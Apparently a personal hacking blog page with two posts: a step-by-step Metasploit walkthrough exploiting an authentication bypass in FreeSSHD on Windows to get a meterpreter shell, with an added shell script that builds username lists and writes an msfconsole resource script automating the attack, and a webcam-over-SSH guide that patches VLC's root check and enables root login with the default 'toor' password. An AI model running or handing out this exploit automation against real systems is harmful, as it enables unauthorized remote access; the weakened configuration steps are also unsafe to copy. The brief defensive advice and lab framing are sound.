JohnKlann / BackTrack

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found an interesting exploit in Metasploit today, mainly out of boredom, and I figured I would share it here. Below you will find a step-by-step of how to use Metasploit to exploit FreeSSHD on Windows to get a meterpreter shell.

start: FreeSSHD on your Windows victim box and check its settings for a custom port (the default SSH port is 22; whatever is configured here is the RPORT you set later).

freesshd_configurations


start: msfconsole in Kali

msfconsole


search: ssh

search_ssh


copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options


run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings


run: exploit

exploit_shell


Note: This exploit works through a user name list; if the account that FreeSSHD accepts logins for is not in that list, the exploit will not work. If you know the user name, or want to guess it, set it directly with the USERNAME option instead:

ex: set USERNAME crazy_user123456789

Note: You can also find larger user name lists and add them to the list Metasploit uses by default, located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt”, or point the module at your own list with the USER_FILE option:

ex: set USER_FILE /yourpath/users.txt

Note: Kali of course ships with built-in wordlists, which you can find under the following location (the dirbuster lists are directory and file names rather than account names, so expect a lower hit rate than with a list built for user names):

ex: /usr/share/dirbuster/wordlists/
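The walkthrough above, turned into something repeatable: a merged USER_FILE built the way the notes suggest, and an msfconsole resource script that sets the same module options. This is an added example, not code from the original post; the file paths, the target addresses and the helper names merge_userlists and write_rc are assumptions, and the wordlists referenced in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post). Builds a custom USER_FILE from
# several wordlists and writes an msfconsole resource script that sets the
# same options as the walkthrough. File paths, addresses and function names
# are assumptions.

# merge_userlists OUT FILE...
# Concatenates wordlists into OUT: strips CR (Windows line endings), blank
# lines and '#' comment lines, and drops duplicates while keeping first-seen
# order, since the module tries names top to bottom (put the likeliest list
# first). Prints the number of names written.
merge_userlists() {
    out=$1; shift
    cat "$@" | tr -d '\r' \
        | grep -v '^[[:space:]]*#' \
        | grep -v '^[[:space:]]*$' \
        | awk '!seen[$0]++' > "$out"
    wc -l < "$out" | tr -d ' '
}

# write_rc OUT RHOST RPORT LHOST LPORT USER_FILE
# Writes a resource script equivalent to typing the use/set/exploit lines
# above into msfconsole; run it with: msfconsole -q -r OUT
write_rc() {
    rc=$1; rhost=$2; rport=$3; lhost=$4; lport=$5; users=$6
    [ -r "$users" ] || { echo "user file not readable: $users" >&2; return 1; }
    cat > "$rc" <<EOF
use exploit/windows/ssh/freesshd_authbypass
set RHOST $rhost
set RPORT $rport
set LHOST $lhost
set LPORT $lport
set USER_FILE $users
exploit
EOF
}

# Usage on Kali (assumed paths and addresses):
#   merge_userlists /tmp/users.txt /usr/share/dirbuster/wordlists/*.txt /root/my_users.txt
#   write_rc /tmp/freesshd.rc 192.168.1.20 22 192.168.1.10 4444 /tmp/users.txt
#   msfconsole -q -r /tmp/freesshd.rc
```

Order matters in the merged list: the module stops at the first name that works, so the list you trust most should be passed first.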

Note: Once the exploit works you have a meterpreter shell :)

Solution: if you are trying to protect against this attack, a hard-to-guess user name only makes the guessing step more expensive, because the flaw is an authentication bypass in FreeSSHD itself rather than a weak password. Replace the vulnerable FreeSSHD build with another SSH server, such as Cygwin's sshd, on your Windows machines.

jklann

How to Stream a Webcam through SSH with VLC on Backtrack 5 R3 Gnome 32

 

Step 1 is needed on both the server (the box with the webcam) and the client. Step 2 is only needed on the server, since that is the only side that has to accept SSH connections.
Step 1: Install VLC and fix it for BackTrack 5

apt-get install vlc

VLC refuses to start as root, and BackTrack runs everything as root. The usual workaround is to patch the binary so that the uid check calls getppid() (which is never 0) instead of geteuid():

hexedit /usr/bin/vlc

Press Tab to switch to the ASCII column, find the string geteuid (it shows up as geteuid._libc_start_main, where the dot is the NUL byte separating two symbol names) and overwrite the seven letters geteuid with getppid, leaving the dot and everything after it untouched. Both names are seven bytes long, which is why the file can be edited in place without shifting anything else in the ELF.

Ctrl+X to exit

y to save the change

vlc “and it should now work”

Keep in mind that this only removes VLC's own safety check: the player, its codecs and the webcam stream still run as root. On anything other than a throwaway lab image, running VLC from an unprivileged account is the better fix.


Step 2: Setting up ssh (if you have never used it)

nano /etc/ssh/sshd_config

Add the following lines, or un-comment them if they are already there:

PermitRootLogin yes
UsePrivilegeSeparation yes

X11Forwarding yes
X11DisplayOffset 10
TCPKeepAlive yes

UsePAM yes

Note: PermitRootLogin yes lets anyone who knows the root password log in as root over the network, and BackTrack ships with the well-known default root password “toor”. Change it (passwd) before you start sshd on anything but an isolated lab network.

If sshd has never run on this box it has no host keys yet, so generate them. These are the server's host keys, not a user key pair: give them the paths below and leave the passphrase empty, because sshd cannot prompt for one and will not load a passphrase-protected host key. (On a Debian-based system, dpkg-reconfigure openssh-server regenerates them as well.)

ssh-keygen
Enter file in which to save the key (/root/.ssh/id_rsa):
/etc/ssh/ssh_host_rsa_key
Enter passphrase (empty for no passphrase): [just press Enter]
Enter same passphrase again: [just press Enter]

ssh-keygen -t dsa
Enter file in which to save the key (/root/.ssh/id_dsa):
/etc/ssh/ssh_host_dsa_key
Enter passphrase (empty for no passphrase): [just press Enter]
Enter same passphrase again: [just press Enter]
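Steps 1 and 2 as shell functions with the checks a careful operator wants: the binary patch refuses to proceed unless the file keeps its exact size (the whole trick relies on geteuid and getppid being the same length), and the sshd_config edit sets each directive exactly once instead of leaving a commented and an active copy side by side. This is an added example, not code from the original post; the file paths and the function names patch_vlc_rootcheck, set_sshd_option and apply_post_sshd_settings are assumptions, and the config and binary used in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): the hexedit patch and the
# sshd_config edits from Steps 1 and 2 as shell functions. File paths and
# function names are assumptions. Uses GNU sed (-i) and POSIX awk.

# patch_vlc_rootcheck FILE
# The same byte change the post makes in hexedit: every 'geteuid' becomes
# 'getppid', so VLC's refuse-to-run-as-root check never sees uid 0. Safe only
# because both names are 7 bytes, so nothing in the ELF moves; the function
# keeps a .orig copy and backs the change out if the size changed anyway.
patch_vlc_rootcheck() {
    f=$1
    grep -qa geteuid "$f" || { echo "no geteuid symbol in $f" >&2; return 1; }
    before=$(wc -c < "$f" | tr -d ' ')
    cp -p "$f" "$f.orig"
    # LC_ALL=C keeps sed from tripping over non-UTF-8 bytes in the binary
    LC_ALL=C sed -i 's/geteuid/getppid/g' "$f"
    after=$(wc -c < "$f" | tr -d ' ')
    if [ "$before" != "$after" ]; then
        mv "$f.orig" "$f"; echo "size changed, restored original" >&2; return 1
    fi
    ! grep -qa geteuid "$f"
}

# set_sshd_option FILE KEY VALUE
# Sets 'KEY VALUE' exactly once in an sshd_config: the first existing line
# for KEY (commented out or not) is replaced, later duplicates are dropped,
# and the directive is appended if it was not there at all. Keys are matched
# case-insensitively, as sshd itself does.
set_sshd_option() {
    cfg=$1; key=$2; val=$3
    awk -v k="$key" -v v="$val" '
        {
            line = $0
            sub(/^[ \t]*#?[ \t]*/, "", line)      # drop indent and comment marker
            split(line, f, /[ \t=]+/)             # f[1] is the directive name
            if (tolower(f[1]) == tolower(k)) {
                if (!done) { print k " " v; done = 1 }
                next
            }
            print
        }
        END { if (!done) print k " " v }
    ' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# apply_post_sshd_settings FILE
# The six directives the post tells you to add or un-comment.
apply_post_sshd_settings() {
    for kv in "PermitRootLogin yes" "UsePrivilegeSeparation yes" \
              "X11Forwarding yes" "X11DisplayOffset 10" \
              "TCPKeepAlive yes" "UsePAM yes"; do
        set_sshd_option "$1" "${kv% *}" "${kv#* }"
    done
}

# On the real box (assumed paths), after the functions above:
#   patch_vlc_rootcheck /usr/bin/vlc
#   apply_post_sshd_settings /etc/ssh/sshd_config
#   ssh-keygen -t rsa -N '' -f /etc/ssh/ssh_host_rsa_key   # host keys: no passphrase
#   ssh-keygen -t dsa -N '' -f /etc/ssh/ssh_host_dsa_key
#   sshd -t && start ssh                                    # syntax-check before starting
```

The sshd -t step in the usage comment is worth keeping: a typo in sshd_config is otherwise only discovered when the service fails to start, which on a remote box means no way back in.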

Step 3: Now start sshd on the server by running the command below (start is the Upstart command on BackTrack 5):

start ssh

Step 4: Now that everything is set up, let's start the webcam stream.

On the client, open the SSH session with compression, X11 forwarding and a local forward of port 9091 to the server's loopback interface:

ssh -C -X root@serverip -L 9091:localhost:9091
password:
“backtrack’s default is: toor”

Note: If you get an error about the SSH host key not matching (for example because you just regenerated the host keys in Step 2), remove only the stale entry for that server rather than wiping the whole file, and only once you know why the key changed, since a changed host key is also exactly what a man-in-the-middle looks like:

gedit /root/.ssh/known_hosts

Delete the line for serverip and save the file (ssh-keygen -R serverip does the same in one step).

Then, inside that SSH session (so on the server), run the command below. The HTTP output is bound to localhost:9091 on the server, so the stream is only reachable through the tunnel and not by anyone else on the network:

vlc v4l2:// :v4l2-dev=/dev/video0 :v4l2-adev=/dev/dsp :v4l2-standard=0 :sout="#transcode{vcodec=mp4v,vb=800,scale=1,acodec=mpga,ab=128,channels=2}:duplicate{dst=std{access=http,mux=ts,dst=localhost:9091}}"

Now open a new terminal on the client and run this command; the -L forward carries it to the server:

vlc http://localhost:9091
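The point of the tunnel is that the webcam stream is never exposed on the network, which only holds if VLC's HTTP output really binds to loopback on the server. The added example below, which is not code from the original post, checks that twice: before starting VLC by parsing the :sout chain, and afterwards by reading the listener table from netstat -ltn or ss -ltn. The port, device and host names are assumptions, and the netstat lines in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): sanity checks for Step 4.
# Port, device and host names are assumptions.

# stream_sout PORT -> the :sout chain from the post, HTTP output on localhost
stream_sout() {
    printf '#transcode{vcodec=mp4v,vb=800,scale=1,acodec=mpga,ab=128,channels=2}:duplicate{dst=std{access=http,mux=ts,dst=localhost:%s}}' "$1"
}

# server_cmd PORT DEVICE -> the vlc line to paste into the ssh session on the server
server_cmd() {
    printf 'vlc v4l2:// :v4l2-dev=%s :v4l2-adev=/dev/dsp :v4l2-standard=0 :sout="%s"\n' \
        "$2" "$(stream_sout "$1")"
}

# sout_bind_host SOUT -> host part of the 'dst=' inside the std{...} output
# (empty when the chain says dst=:PORT, which binds every interface)
sout_bind_host() {
    printf '%s' "$1" | sed -n 's/.*std{[^}]*dst=\([^:}]*\):[0-9]*.*/\1/p'
}

# sout_is_local SOUT -> 0 if the HTTP output will listen on loopback only
sout_is_local() {
    case "$(sout_bind_host "$1")" in
        localhost|127.0.0.1|::1) return 0 ;;
        *) return 1 ;;
    esac
}

# listeners_on PORT -> local address of every TCP listener on PORT, read from
# `netstat -ltn` or `ss -ltn` output on stdin (both put Local Address in $4)
listeners_on() {
    awk -v p="$1" '{
        addr = $4; port = addr
        sub(/.*:/, "", port)                       # text after the last colon
        if (port == p) { sub(/:[^:]*$/, "", addr); print addr }
    }'
}

# listener_is_local PORT -> 0 if there is at least one listener on PORT and
# every one of them is bound to a loopback address; run after vlc has started
listener_is_local() {
    listeners_on "$1" | {
        n=0; bad=0
        while read -r addr; do
            n=$((n + 1))
            case "$addr" in 127.0.0.1|::1|'[::1]'|localhost) ;; *) bad=1 ;; esac
        done
        [ "$n" -gt 0 ] && [ "$bad" -eq 0 ]
    }
}

# Usage on the server (assumed port and device):
#   sout_is_local "$(stream_sout 9091)" && server_cmd 9091 /dev/video0
#   ... start vlc with the printed line, then:
#   netstat -ltn | listener_is_local 9091 || echo "stream is exposed on the network"
```

A dst=:9091 or dst=0.0.0.0:9091 in the chain would make VLC listen on every interface, at which point the SSH tunnel adds nothing and anyone on the LAN can open http://serverip:9091; the second check catches the same mistake after the fact, whatever put the listener there.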

 


jklann